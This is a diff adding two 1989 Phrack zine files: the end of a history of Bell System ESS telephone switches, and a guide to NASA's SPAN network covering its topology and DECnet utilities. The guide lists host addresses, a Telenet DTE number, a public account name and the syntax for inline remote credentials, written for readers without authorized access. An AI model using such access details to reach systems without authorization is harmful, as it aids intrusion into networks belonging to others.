+regions but doing so economically, meeting the need for 2,000 to 10,000 line
+offices.  It has a call capacity of 19,000 with a maximum of 24,000 terminals
+per system.  One of the differences between the 1ESS and the 2ESS is that in
+the 2ESS, lines and trunks terminate on the same side of the network, which is
+called a folded network.  There is no need for separate line and trunk link
+networks as in the 1ESS.  Also, the network architecture was designed to
+interface with customer lines carrying lighter traffic, the features were
+oriented toward residential rather than business lines, and the processor was
+smaller and less expensive.
+
+         In 1976, the first 2BESS switch was introduced in Acworth, GA.  The
+2BESS switch is similar to the 1AESS in that it has something added into the
+switch.  In this case, though, it is the 3ACC (3A Central Control), which is
+in the place of the processor.  The 3ACC doubles the call capacity originally
+available in the 2ESS switch by combining integrated circuit design with
+semiconductor memory stores.  It also requires one-fifth of the floor space
+and one-sixth of the power and air conditioning that the 2ESS central
+processor requires.  The 3ACC is a self-checking, microprogram-controlled
+processor capable of high-speed serial communication.  Resident programs in
+the 3ACC are hardware write-protected, but non-resident programs like
+maintenance, recent change (RC), and back-up for translations or residential
+programs are stored on a tape cartridge.
+
+         Also in 1976, the need for switching in rural areas serving fewer
+than 4500 lines resulted in the introduction of the 3ESS switch.  The 3ESS
+switching equipment is the smallest Western Electric space-division,
+centralized electronic switching system which serves 2,000 to 4,500 lines.
+The 3ACC is used as the processor in the 3ESS, which was designed to meet the
+needs of a typical Community Dial Office (CDO).  It, too, is a folded network
+like the 2ESS and 2BESS.  The switch was designed for unattended operation,
+implementing extensive maintenance programs as well as remote SCCS (Switching
+Control Center System) maintenance capabilities.
+
+         The 4ESS switching equipment is a large-capacity tandem system for
+trunk-to-trunk interconnection.  It forms the heart of the Stored-Program
+Control (SPC) network that uses CCIS (Common-Channel Interoffice Signaling)
+yet still supports Multi-Frequency (MF) and Dial-Pulse (DP) signaling.  The
+SPC network allows for features such as the Mass Announcement System (MAS)
+(which is where we find all of our entertaining 900 Dial-It numbers) and
+WATS (Wide-Area Telecommunications Services) screening/routing.  The 4ESS also
+provides international gateway functions.  It uses a 1A Processor as its main
+processor, which, along with its use of core memories and higher speed logic,
+is about five times as fast as the 1ESS processor.  The 4ESS software
+structure is based on a centralized development process using three languages:
+a low-level assembly language, the intermediate language called EPL (ESS
+Programming Language), and a high level language called EPLX.  The assembly
+language takes care of real-time functions like call processing while
+measurements and administrative functions frequently are programmed in EPL.
+Some maintenance programs and audits which are not as frequently run are in
+EPLX.  Up to six 4ESS switches can be remotely administered and maintained
+from centralized work centers which means that very few functions need to be
+performed at the site of the switch itself.
+
+         In March of 1982, the 5ESS switch first went into operation.  It is a
+digital time-division electronic switching system designed for modular growth
+to accommodate local offices ranging from 1,000 to 100,000 lines.  It was
+designed to replace remaining electromechanical switching systems in rural,
+suburban, and urban areas economically.  Features of new generic versions of
+the program allowed multimodule configuration and local/toll features for
+combined class 4 and class 5 operation.  The 5ESS administrative module
+processor consists of two 3B20s.  The communications module consists of a
+message switch and a TMS (Time-Multiplexed Switch), which is used to connect
+voice channels in one interface module to voice channels in another interface
+module as well as for data messages between the administrative modules and
+interface modules and also is used for data messages between interface
+modules.  The interface module can host analog line/trunk units, digital
+line/trunk units, digital carrier line units, digital service circuit units,
+or metallic service units in addition to miscellaneous test and access units.
+There are 2 software divisions in the 5ESS.  The portion in the administrative
+module processor is responsible for officewide functions such as the human
+interfaces, routing, charging, feature translations, switch maintenance, and
+data storage and backup.  The portion in the interface module is responsible
+for the standard call-processing functions associated with the lines and
+trunks terminating on that interface module.  Most software is written in C
+and has a modular structure to afford easy expansion and maintenance.
+
+         The last thing to mention here are Remote Switching Systems (RSS) and
+Remote Switching Modules (RSM).  The No. 10A RSS is designed to act as an
+extension of a 1ESS, 1AESS, or 2BESS switching equipment host and is
+controlled remotely by the host over a pair of dedicated data links.  It
+shares the processor capabilities of these nearby ESS switches and uses a
+microprocessor for certain control functions under the direction of the host
+central processor.  The RSS is capable of stand-alone functioning if the links
+between it and the host are severed somehow.  If this occurs, though, custom
+calling, billing, traffic measurements, etc. are unavailable -- only basic
+service on intra-RSS calls is allowed.  The No. 5A RSM can be located up to
+100 miles from the 5ESS host and can terminate a maximum of 4000 lines with a
+single interface module.  Several RSMs can be interconnected to serve remote
+offices as large as 16,000 lines.  It is a standard 5ESS system interface
+module with the capability for stand-alone switching capability if the
+host-remote link fails.  One difference from the RSS of the RSM is the ability
+to use direct trunking, whereas the RSS requires that all interoffice calls
+pass through the host switch.
+
+         Of course, there are many other switches out there, but these are the
+basic Western Electric switches provided for the Bell System.  The following
+is a time-table to summarize the occurrences of SPC switching systems that have
+been used by BOCs and AT&T:
+
+1965    The 1ESS used for local metropolitan allows 65,000 lines and 16,000
+        trunks.
+1968    The 1ESS expands for local metropolitan and local tandem.
+1970    The 2ESS used for local suburban has 30,000 lines and trunks together.
+1974    The 1ESS allows 2-wire toll switching.
+1976    The 4ESS uses large 4-wire toll for use of 100,000 trunks.
+1976    The 1AESS for large metropolitan local use has 90,000 lines and 32,000
+        trunks
+1976    The 2BESS for local suburban use has 30,000 lines and trunks together.
+1976    The 3ESS for local rural use has 5,800 lines and trunks together.
+1977    The 1AESS using 4-wire toll.
+1979    The 1AESS has local, tandem, and toll capability.
+1979    The 10A RSS is for local small rural areas with 2,000 lines.
+1982    The 5ESS for local rural to large metropolitan areas with tandem and
+        toll capabilities has from 150,000 lines and 50,000 trunks to 0 lines
+        and 60,000 trunks.
+______________________________________________________________________________
diff --git a/phrack25/4.txt b/phrack25/4.txt
new file mode 100644
index 0000000..f31264f
--- /dev/null
+++ b/phrack25/4.txt
@@ -0,0 +1,940 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 25, File 4 of 11
+
+              =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+              =-=                                             =-=
+              =-=                   S P A N                   =-=
+              =-=                                             =-=
+              =-=       Space Physics Analysis Network        =-=
+              =-=                                             =-=
+              =-=     Brought To You by Knight Lightning      =-=
+              =-=                                             =-=
+              =-=               March 15, 1989                =-=
+              =-=                                             =-=
+              =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+
+Preface
+~~~~~~~
+In the spirit of the Future Transcendent Saga, I continue to bring forth
+information about the wide area networks.  The information presented in this
+file is based primarily on research.  I do not have direct access to SPAN other
+than through TCP/IP links, but this file should provide you with general
+information with which to properly use the Space Physics Analysis Network.
+
+
+Introduction
+~~~~~~~~~~~~
+The Space Physics Analysis Network (SPAN) has rapidly evolved into a broadly
+based network for cooperative, interdisciplinary and correlative space and
+Earth science data analysis that is spaceflight mission independent.  The
+disciplines supported by SPAN originally were Solar-Terrestrial and
+Interplanetary Physics.  This support has been expanded to include Planetary,
+Astrophysics, Atmospherics, Oceans, Climate, and Earth Science.
+
+SPAN utilizes up-to-date hardware and software for computer-to-computer
+communications allowing binary file transfer, mail, and remote log-on
+capability to over 1200 space and Earth science computer systems in the United
+States, Europe, and Canada.  SPAN has been reconfigured to take maximum
+advantage of NASA's Program Support Communication Network (PSCN) high speed
+backbone highway that has been established between its field centers.  In
+addition to the computer-to-computer communications which utilizes DECnet, SPAN
+provides gateways to the NASA Packet Switched System (NPSS), GTE/Telenet,
+JANET, ARPANET, BITNET and CSNET.  A major extension for SPAN using the TCP/IP
+suite of protocols has also been developed.
+
+This file provides basic information on SPAN, it's history, architecture, and
+present guidelines for it's use.  It is anticipated that SPAN will continue to
+grow very rapidly over the next few years.  Several existing wide-area DECnet
+networks have joined with SPAN to provide a uniform internetwork structure and
+more will follow.
+
+
+History Of The SPAN and the Data Systems Users Working Group (DSUWG)
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+A considerable evolution has occurred in the past two decades in the way
+scientific research in all disciplines is done.  This is particularly true of
+NASA where early research was centered around exploratory missions in which
+measurements from individual scientific instruments could be meaningfully
+employed to advance the state of knowledge.  As these scientific disciplines
+have progressed, a much more profound and interrelated set of questions is
+being posed by researchers.  The result is that present-day investigations are
+generally much more complex.  For example, within the space science community
+large volumes of data are acquired from multiple sensors on individual
+spacecraft or ground-based systems and, quite often, data are needed from many
+institutions scattered across the country in order to address particular
+physical problems.  It is clear that scientific research during the late 1980s
+and beyond will be devoted to intense multi-disciplinary studies aimed at
+exploring very complex physical questions.  In general, the need for
+researchers to exchange data and technical information in a timely and
+interactive way has been increasing.
+
+The problems of data exchange are exacerbated by the lack of standards for
+scientific data bases.  The net result is that, at present, most researchers
+recognize the value of multi-disciplinary studies, but the cost in time and
+effort is devastating to their research efforts.  This trend is antithetical to
+the needs of the NASA research community.  SPAN is only one of many research
+networks that are just beginning to fill a need for access to remote
+capabilities that are not obtainable locally.
+
+In May of 1980 the Space Plasma Physics Branch of the Office of Space Science
+of NASA Headquarters funded a project at Marshall Space Flight Center (MSFC) to
+investigate ways of performing correlative space plasma research nationwide on
+a daily basis.  As a first step, a user group was formed called the Data
+Systems Users Working Group (DSUWG) to provide the space science community
+interaction and direction in the project.  After the first meeting of the DSUWG
+in September 1980, it was decided that the approach would be to design, build,
+and operate a spacecraft mission independent science network as a test case.
+In addition, the construction of the system would be designed to use existing
+data analysis computer systems at space physics institutions and to take full
+advantage of "off-the-shelf" software and hardware.
+
+The Space Physics Analysis Network (SPAN) first became operational in December
+1981 with three major nodes:
+
+o  University of Texas at Dallas
+o  Utah State University
+o  MSFC
+
+Since that time it has grown rapidly.  Once operational, SPAN immediately
+started to facilitate space-data analysis by providing electronic mail,
+document browsing, access to distributed data bases, facilities for numeric and
+graphic data transfer, access to Class VI machines, and entry to gateways for
+other networks.
+
+The DSUWG continues to provide guidance for SPAN growth and seeks to identify,
+promote, and implement appropriate standards for the efficient management and
+exchange of data, related information, and graphics.  All SPAN member
+organizations are expected to participate in the DSUWG.  The basic composition
+of the DSUWG is a representative scientist and computer systems manager (who
+has the networking responsibility) at each of the member institutions.  DSUWG
+meetings are held regularly at approximately nine month intervals.
+
+The DSUWG is structured along lines conducive to addressing major outstanding
+problems of scientific data exchange and correlation.  There is a chairman for
+each subgroup to coordinate and focus the group's activities and a  project
+scientist to oversee the implementation of the DSUWG recommendations and
+policies.  The working group itself is divided into several subgroups which
+address issues of policy, networking and hardware, software and graphics
+standards, and data base standards.
+
+The DSUWG is a dynamic, evolving organization.  We expect members to move in
+(or out) as appropriate to their active involvement in data related issues.  We
+also realize that at present SPAN and the DSUWG are dealing with only a limited
+portion of the whole spectrum of problems facing the NASA research community.
+As present problems are solved, as the network evolves, and as new issues
+arise, we look to the DSUWG to reflect these changes in it's makeup, structure,
+and focus.
+
+The SPAN is currently managed by the National Space Science Data Center (NSSDC)
+located at Goddard Space Flight Center (GSFC).  All SPAN physical circuits are
+funded by the Communication and Data Systems Division at NASA Headquarters.
+Personnel at the NSSDC facility, at the NASA SPAN centers, and the remote
+institutions work in unison to manage and maintain the network.
+
+
+Network Configuration and Evolution
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+The initial topology for SPAN was a modified star where all communication with
+the remote institutions came to a major central switching or message routing
+node at MSFC.  This topology served the network well until many new nodes were
+added and more scientists became accustomed to using the network.  As data rate
+demands on the network increased, it was apparent that a new topology using
+lines with higher data rates was needed.  Toward this end, a new communication
+architecture for SPAN was constructed and implemented.
+
+The current structure of SPAN in the United States is composed of an
+interconnected four-star, mesh topology.  Each star has, as its nucleus, a SPAN
+routing center.  The routing centers are located at GSFC, MSFC, Jet Propulsion
+Lab (JPL), and Johnson Space Center (JSC).  The routing centers are linked
+together by a set of redundant 56 kbps backbone circuits.  Tail circuits, at
+speeds of 9.6 kbps (minimum line speed), are connected to each routing center
+and and into the SPAN backbone.
+
+Most remote institutions have local area networks that allow a number of
+different machines to be connected to SPAN.   Regardless of a machine's
+position in the network, all computers on SPAN are treated logically equal.
+The main goal of the new SPAN architecture is for a node that is located across
+the country through two routing centers to be as transparently accessible as a
+SPAN node sharing the same machine room with the originating system.  This ease
+of use and network transparency is one of SPAN's greatest assets.
+
+The new configuration allows for rapid expansion of the network via the
+addition of new tail circuits, upgrade to existing tail circuits, and dynamic
+dialing of higher data-rate backbone circuits Implementation of this new
+configuration began in July 1986, and the new topology was completed in
+November 1986, although there are new circuits being added on a continuing
+basis.  It is expected that a fifth routing center located at Ames Research
+Center.
+
+Nearly all of the machines on SPAN are linked together using the commercially
+available software package DECnet.  DECnet allows suitably configured computers
+(IBM-PCs and mainframes, SUN/UNIX workstations, DEC/PROs, PDPs, VAXs, and
+DECSYSTEMs) to communicate across a variety of media (fiber optics, coax,
+leased telephone lines, etc.) utilizing a variety of low level protocols
+(DDCMP, Ethernet, X.25).  There are also several institutions that are
+connected through Janus hosts which run more then one protocol.
+
+SPAN links computers together and touches several other networks in the United
+States, Europe, and Canada  that are used for data analysis on NASA spaceflight
+missions and other NASA related projects.  At this time, there are well over
+1200+ computers that are accessible through SPAN.
+
+DECnet networks has been accomplished by the unprecedented, successful
+cooperation of the network management of the previously separate networks.  For
+example, the International High Energy Physics Network (HEPNET), the Canadian
+Data Analysis Network (DAN) and the Texas University Network (TEXNET) now have
+nonconflicting network addresses.  Every node on each of these networks is as
+accessible to SPAN users as any other SPAN node.  The mutual cooperation of
+these WANs has given enhanced capabilities for all.
+
+There are several capabilities and features that SPAN is developing, making it
+unique within the NASA science community.  The SPAN system provides remote
+users with access to science data bases and brings scientists throughout the
+country together in a common working environment. Unlike past NASA mission
+networks, where the remote sites have only remote terminals (supporting one
+person at the remote site at a time), SPAN supports many users simultaneously
+at each remote node through computer-to-remote computer communications
+software.  Users at their institutions can participate in a number of network
+functions involving other remote computer facilities.  Scientific papers, data
+and graphics files can easily be transferred between network nodes.  This
+significantly reduces the time it takes to perform correlative work when
+authors are located across the country or ocean.  As an introduction to SPAN's
+network wide capabilities.  More advanced users are referred to the DEC DECnet
+User's Manual.
+
+SPAN will continue to be used as a test case between NASA science investigators
+with the intent of exploring and employing modern computer and communication
+technology as a tool for doing NASA science research.  This can be accomplished
+because SPAN is not a project dependent system that requires a static hardware
+and software configuration for the duration of a mission.  SPAN has provided a
+quick reaction capability for several NASA and ESA missions.  Each of these
+missions needed to rapidly move near real-time ground and spacecraft
+observations to a variety of destinations for analysis and mission planning.
+Because of SPAN's great success, new NASA spaceflight missions are seriously
+looking into creating networks with similar capabilities that are
+internetworked with SPAN.
+
+Within the next few years, new developments in software and hardware will be
+implemented on SPAN that will continue to aid NASA science research.  It is
+anticipated that SPAN will greatly improve its access to gateways into Europe
+and other locations throughout the world.  As a natural evolution, SPAN will
+migrate toward the International Standards Organization's (ISO) Open Systems
+Interconnect (OSI) protocol as the software becomes available.  It is expected
+that the ISO/OSI protocol will greatly enhance SPAN and increase the number of
+heterogeneous computer systems accessible.
+
+
+Security And Conduct On The Network
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Misconduct is defined as:
+
+     1.  Any unauthorized access or use of computers on the network,
+     2.  Attempts to defeat computer security systems (e.g. violating a captive
+         account),
+     3.  Repeated login failures to computers or privileged accounts to which
+         the user is not authorized to use,
+     4.  Massive file transfers from a given site without prior consent and
+         coordination with the appropriate SPAN routing centers.
+
+The network is monitored very closely, and it is relatively simple to spot an
+attempted break-in and then track down the source.  When a violation is found,
+the matter will be reported to the DSUWG steering committee and the SPAN line
+will be in immediate danger of being disconnected.  If the situation cannot be
+resolved to the satisfaction of both the DSUWG steering committee and network
+management, the SPAN line to the offending site will be reviewed for the
+possibility of permanent disconnection.  In short, NASA pays for the
+communications lines and will not tolerate misconduct on the network.
+
+
+SPAN Network Information Center (SPAN-NIC)
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+The SPAN-NIC is located at the National Space Science Data Center in Greenbelt,
+Maryland.  The purpose of the SPAN-NIC is to provide general user services and
+technical support to SPAN users via telephone, electronic mail, and postal
+mail.
+
+As SPAN has grown exponentially over recent years, it was realized that a
+central organization had to be developed to provide users with technical
+assistance to better utilize the resources that the network provides.  This is
+accomplished by maintaining and distributing relevant technical documents,
+providing user assistance on DECnet related questions, monitoring traffic on
+the network, and maintaining an online data base of SPAN node information.
+More specific information on becoming a SPAN site, beyond that provided in this
+document, can also be obtained through SPAN-NIC.
+
+The SPAN-NIC uses a VAX 8650 running VMS as its host computer.  Users wishing
+to use the online information services can use the account with the username
+SPAN_NIC.  Remote logins are capable via SET HOST from SPAN, TELENET from
+ARPANET and by other procedures detailed later.
+
+        SPAN-NIC DECnet host address: NSSDCA or 6.133
+
+        SPAN-NIC ARPANET host address: NSSDC.ARPA or 128.183.10.4
+
+        SPAN-NIC GTE/TELENET DTE number: 311032107035
+
+An alternative to remote login is to access online text files that are
+available.  These text files reside in a directory that is pointed to by the
+logical name "SPAN_NIC:". Example commands for listing this directory follow:
+
+        From SPAN: $ DIRECTORY NSSDCA::SPAN__NIC:
+        From ARPA: FTP> ls SPAN__NIC:
+
+The available files and a synopsis of their contents can be found in the file
+"SPAN_NIC:SPAN_INDEX.TXT".  Once a file is identified, it can be transferred to
+the remote host using the VMS COPY command, or the FTP GET command.  It is
+important to note that this capability will be growing significantly not only
+to catch up to the current SPAN configuration but also keep current with its
+growth.
+
+
+DECnet Primer
+~~~~~~~~~~~~~
+The purpose of the SPAN is to support communications between users on network
+nodes.  This includes data access and exchange, electronic mail communication,
+and sharing of resources among members of the space science community.
+
+Communication between nodes on the SPAN is accomplished by means of DECnet
+software.  DECnet software creates and maintains logical links between network
+nodes with different or similar operating systems. The operating systems
+currently in use on SPAN are VAX/VMS, RSX, and IAS. DECnet provides network
+control, automatic routing of messages, and a user interface to the network.
+The DECnet user interface provides commonly needed functions for both terminal
+users and programs.  The purpose of this section of the file is to provide a
+guide on the specific implementation of DECnet on SPAN and is not intended to
+supercede the extensive manuals on DECnet already produced by DEC.
+
+DECnet supports the following functions for network users:
+
+1. TASK-TO-TASK COMMUNICATIONS:  User tasks can exchange data over a network
+   logical link.  The communicating tasks can be on the same or different
+   nodes.  Task-to- task communication can be used to initiate and control
+   tasks on remote nodes.
+
+2. REMOTE FILE ACCESS:  Users can access files on remote nodes at a terminal or
+   within a program.  At a terminal, users can transfer files between nodes,
+   display files and directories from remote nodes, and submit files containing
+   commands for execution at a remote node. Inside a program, users can read
+   and write files residing at a remote node.
+
+3. TERMINAL COMMUNICATIONS:  RSX and IAS users can send messages to terminals
+   on remote RSX or IAS nodes.  This capability is available on VMS nodes by
+   using the PHONE utility.
+
+4. MAIL FACILITY:  VMS users can send mail messages to accounts on remote VMS
+   nodes.  This capability is currently available for RSX and IAS nodes but is
+   not supported by DEC.  There are slight variations for RSX and IAS network
+   mail compared to VMS mail.
+
+5. REMOTE HOST:  VMS, RSX, and IAS users can log-on to a remote host as if
+   their terminals were local.
+
+
+Network Implementations For DECnet
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+The SPAN includes implementations for RSX, IAS and VAX/VMS operating systems.
+DECnet software exists at all the SPAN nodes and it allows for the
+communication of data and messages between any of the nodes.  Each of the
+network nodes has a version of DECnet that is compatible with the operating
+system of that node.  These versions of DECnet have been presently developed to
+different extents causing some nodes to have more or less capabilities than
+other nodes.  The version or "phase" of the DECnet, as it is called, indicates
+the capability of of that node to perform certain levels of communication.
+Since RSX and IAS implementations are almost identical, they are described
+together.
+
+Users need not have any special privileges (VAX/VMS users will need the NETMBX
+privilege on their account) to run network tasks or create programs which
+access the network.  However users must supply valid access control information
+to be able to use resources.  The term "access control" refers to the user name
+and password of an account (local or on a remote node).
+
+Online system documentation is a particularly important and valuable component
+of DEC systems.  At the present, SPAN is comprised almost completely of DEC
+systems.  An extensive set of system help files and libraries exists on all the
+SPAN DEC nodes.  The HELP command invokes the HELP Utility to display
+information about a particular topic.  The HELP utility retrieves help
+available in the system help files or in any help library that you specify. You
+can also specify a set of default help libraries for HELP to search in addition
+to these libraries.
+
+   Format:   HELP [keyword [...]]
+
+On many systems, new users can display a tutorial explanation of HELP by typing
+TUTORIAL in response to the "HELP Subtopic?" prompt and pressing the RETURN
+key.
+
+
+Utilities for DECnet-VAX
+~~~~~~~~~~~~~~~~~~~~~~~~
+VAX terminal users have several utility programs for network communications
+available from the VMS operating system.  Documentation for most of these
+utilities can be found in the Utility Reference Manual of the VAX/VMS manual
+set, and each utility has extensive online help available.  The following
+descriptions offer a brief introduction to these utilities:
+
+MAIL:  The VAX/VMS mail utility allows you to send a message to any account or
+       to a series of accounts on the network.  To send a message, you must
+       know the account name of the person you wish to contact and his node
+       name or node number. (This will be covered more extensively later in
+       this file).
+
+FINGER:  The DECUS VAX/VMS Finger utility has been installed on a number of
+         SPAN VAX/VMS systems.  Finger allows a user to see who is doing what,
+         both on his machine and on other machines on the network that support
+         Finger.  Finger also allows a user to find information about the
+         location and accounts used by other users, both locally and on the
+         network. The following is an example session using the FINGER utility.
+
+$ FINGER
+
+
+          NSSDCA VAX 8600, VMS V4.3. Sunday, 28-Sep-1986 19:55,4 Users,0 Batch.
+          Up since Sunday, 28-Sep-1986 14:28
+
+ Process         Personal name        Program  Login Idle Location
+
+ HILLS           H.Kent Hills         Tm       19:02      NSSDC.DECnet
+ _RTA4:          Dr. Ken Klenk        Tm       17:55      NSSDC.DECnet
+ _NVA1:          Michael L. Gough     Mail     15:13
+ SPAN Man        Joe Hacker           Finger   17:33      bldg26/111
+
+
+ $ FINGER SWAFFORD@NSSDCA
+
+ [NSSDCA.DECnet]
+
+ NSSDCA VAX/VMS, Sunday, 28-Sep-1986 19:55
+
+ Process         Personal name        Program   Login  Idle Location
+
+ SPAN Man                             Finger    17:33
+
+  Logged in since: Sunday, 28-Sep-1986 17:33
+
+  Mail: (no new mail)
+
+  Plan:
+
+     Joe Hacker, SPAN Hackers Guild
+
+     Telephone: (800)555-6000
+
+If your VAX supports VMS Finger, further information can be found by typing
+HELP FINGER.  If your system does not currently have the FINGER utility, a copy
+of it is available in the form of a BACKUP save set in the file:
+NSSDCA::SPAN_NIC:FINGER.BCK
+
+PHONE:  The VAX/VMS PHONE utility allows you to have an interactive
+        conversation with any current user on the network.  This utility can
+        only be used on video terminals which support direct cursor
+        positioning.  The local system manager should know if your terminal can
+        support this utility.  To initiate a phone call, enter the DCL command
+        PHONE.  This should clear the screen and set up the phone screen
+        format.  The following commands can be executed:
+
+DIAL nodename::username
+
+         Places a call to another user.  You must wait for a response from that
+         user to continue.  DIAL is the default command if just
+         nodename::username is entered.
+
+
+ANSWER Answers the phone when you receive a call.
+
+HANGUP Ends the conversation (you could also enter a CTRL/Z).
+
+REJECT Rejects the phone call that has been received.
+
+DIR nodename::
+
+         Displays a list of all current users on the specified node.  This
+         command is extremely useful to list current users on other nodes of
+         the network.
+
+FACSIMILE filename
+
+         Will send the specified file to your listener as part of your
+         conversation.
+
+To execute any of these commands during a conversation, the switch hook
+character must be entered first.  By default, that character is the percent
+key.
+
+REMOTE FILE ACCESS:  DCL commands that access files will act transparently over
+                     the network.  For example, to copy a file from a remote
+                     node:
+
+$copy
+
+From: node"username password"::disk:[directory]file.lis
+To: newfile.lis
+
+This will copy "file.lis" in "directory" on "node" to the account the command
+was issued in and name it "newfile.lis".  The access information (user name and
+password of the remote account) is enclosed in quotes.  Note that you can also
+copy that same file to any other node and account you desire.  For another
+example, to obtain a directory listing from a remote node, use the following
+command:
+
+$dir node::[directory] (if on the default disk)
+
+
+Utilities for DECnet-11M/DECnet-IAS
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+There are certain DECnet functions that can only be done on nodes that have the
+same type of operating systems, such as the MPB, TRW, SPRL, LASR, and UTD nodes
+all with an RSX-11M operating system.  The capabilities offered to the RSX
+DECnet user can be broken down into two major categories: those functions for
+terminal users and those functions for FORTRAN programmers.
+
+DECnet-11M terminal users have several utility programs available to them which
+allows logging onto other machines in the network, file transfers, message
+communication, and network status information.
+
+REMOTE-LOGON:  The REMOTE-LOGON procedure allows a user at a node to log-on to
+               another node in the network.  This capability is also called
+               virtual terminal.  The "SET /HOST=nodename" command allows the
+               user to log-on to adjacent nodes in the network from a
+               DECnet-11M node.  This command is initiated by simply typing
+               "SET /HOST=nodename".  The "SET HOST" command on the SPAN-VAX
+               also allows you to log-on to adjacent nodes.
+
+NETWORK FILE TRANSFER:  NFT is the Network File Transfer program and is part of
+                        the DECnet software.  It is invoked by typing NFT <CR>
+                        to file = from file or by typing NFT to file = from
+                        file.  Embedded in the file names must be the node
+                        name, access information, and directory if it is
+                        different than the default conventions.  Also note that
+                        file names can only be 9 (nine) characters long on RSX
+                        systems.
+
+                        Therefore, VAX/VMS files with more than 9 characters
+                        will not copy with default-file naming.  In such a case
+                        you must explicitly name the file being copied to an
+                        RSX system.  The following structure for the file names
+                        must be used when talking to the SPAN nodes with NFT.
+
+                        NODE/username/password::Dev:[dir.sub-dir]file.type
+
+                        The following NFT switches are very useful:
+
+                        /LI   Directory listing switch.
+                        /AP   Appends/adds files to end of existing file.
+                        /DE   Deletes one or more files.
+                        /EX   Executes command file stored on remote/local
+                              node.
+                        /SB   Submits command file for execution
+                              (remote/local).
+                        /SP   Spools files to the line printer (works only with
+                              "like" nodes).
+
+                        A particular use for NFT is for the display of graphics
+                        files on the network.  It is important to note,
+                        however, that some device-dependent graphics files are
+                        not all displayable, such as those generated by IGL
+                        software.  The graphic files generated by graphic
+                        packages that are displayable when residing at other
+                        nodes may be displayed by using the following input:
+
+                        NFT> TI:=SPAN/NET/NET::[NETNET.RIMS]D1364.COL
+
+                        Graphics files generated by IGL can be displayed by
+                        running either REPLAY or NETREP programs (see the
+                        net-library documentation).
+
+TERMINAL COMMUNICATIONS:  TLK is the Terminal Communications Utility which
+                          allows users to exchange messages through their
+                          terminals.  TLK somewhat resembles the RSX broadcast
+                          command but with more capabilities.  TLK currently
+                          works only between RSX-11 nodes and within a RSX-11
+                          node.  There are two basic modes of operation for
+                          TLK:  The single message mode and the dialogue mode.
+
+                          The single message mode conveys short messages to any
+                          terminal in the same node or remote node.  The syntax
+                          for this operation is:
+
+                          >TLK TARGETNODE::TTn:--Message--
+
+                          To initiate the the dialogue mode type:
+
+                          >TLK TARGETNODE::TTn<cr>
+
+                          When you receive the TLK> prompt, you can enter a new
+                          message line.
+
+
+Graphics Display Utilities
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+One of the main objectives of the SPAN system project is to accommodate
+coordinated data analysis without leaving one's institution.  Therefore, there
+is a strong need to develop the ability to have graphic images of data from any
+node to be displayed by any other node.  The current inability to display data
+on an arbitrary graphics device at any node has been quickly recognized. As
+general network utilities are developed to support the display of device
+dependent and independent graphic images, the handbook SPAN Graphics Display
+Utilities Handbook will serve to document their use and limitations.  The
+graphics handbook is a practical guide to those common network facilities which
+will be used to support network correlative studies from the one-to-one to the
+workshop levels.  For each graphics software utility the handbook contains
+information necessary to obtain, use, and implement the utility.
+
+
+Network Control Program
+~~~~~~~~~~~~~~~~~~~~~~~
+NCP is the Network Control Program and is designed primarily to help the
+network manager.  However, there are some NCP commands which are useful for the
+general user.  With these commands, the user can quickly determine node names
+and whether nodes are reachable or not.  Help can be obtained by entering
+NCP>HELP and continuing from there.  For a complete listing of all the NCP
+commands that are available to nonpriviledged users, refer to the NCP Utility
+manual on VAXs, and the NCP appendix of the DECnet-11M manual for PDPs.  The
+following two commands are probably the most beneficial to users:
+
+$ RUN SYS$SYSTEM:NCP       !on VAXs
+
+       -or-
+
+> RUN $NCP                 !on PDPs
+
+NCP> SHOW KNOWN NODES      !show a list of all nodes
+                           !   defined in the volatile data base
+NCP> SHOW ACTIVE NODES     !show a list of only currently reachable
+
+Please note that the second command cannot be used on "end nodes", that is,
+nodes that do not perform at least DECnet Level I routing.  In addition, only
+nodes in the user's area will be displayed on either Level I or Level II
+routers.  In the case of end nodes, users should find out the name of the
+nearest Level I or II routing node and issue the following command:
+
+NCP> TELL GEORGE SHOW ACTIVE NODES
+
+
+Mail
+~~~~
+As briefly discussed earlier all SPAN DEC nodes have a network mail utility.
+Before sending a mail message, the node name and user name must be known.  To
+send a message to the project manager, you would enter the following commands:
+
+$ MAIL
+
+MAIL> SEND
+
+To: NSSDCA::THOMAS
+Subj: MAIL UTILITY TEST
+Enter your message below. Press ctrl/z when complete
+ctrl/c to quit:
+
+VALERIE,
+   OUR NETWORK CONNECTION IS NOW AVAILABLE AT ALL TIMES.  WE ARE LOOKING
+FORWARD TO WORKING FULL TIME ON SPAN.  THANKS FOR ALL YOUR HELP.
+
+                            FRED
+<CTRL/Z>
+
+MAIL>EXIT
+
+In order to send mail to more than one user, list the desired network users on
+the same line as the TO: command, separating each with a comma.  Another way to
+accomplish this is to use a file of names.  For example, in the file SEPAC.DIS,
+all SEPAC investigators on SPAN are listed:
+
+        SSL::ROBERTS
+        SSL::REASONER
+        SSL::CHAPPELL
+        SWRI::JIM
+        TRW::TAYLOR
+        STAR::WILLIAMSON
+
+The network mail utility will send duplicate messages to all those named in the
+above file by putting the file name on the TO: command line (TO: @SEPAC).  A
+second option for the SEND command is to include a file name that contains the
+text to be sent.  You will still be prompted for the To: and Subject:
+information.  The following statements give a brief description of other
+functions of the MAIL utility:
+
+ READ n     Will list, on the terminal, the mail message corresponding to
+            number n.  If n is not entered, new mail messages will be listed.
+
+ EXTRACT    Saves a copy of the current message to a designated file.
+
+ FORWARD    Sends a copy of the current message to other users.
+
+ REPLY      Allows you to send a message to the sender of the current message.
+
+ DIR        Lists all messages in the current folder that you have selected.
+            The sequence numbers can then be used with the READ command.
+
+ DEL        Delete the message just read.  The message is actually moved to the
+            WASTEBASKET folder until you exit the utility, when it is actually
+            deleted.  Therefore, you can retrieve a message that you have
+            "deleted", up until you enter "exit" or ^Z to the MAIL> prompt.
+
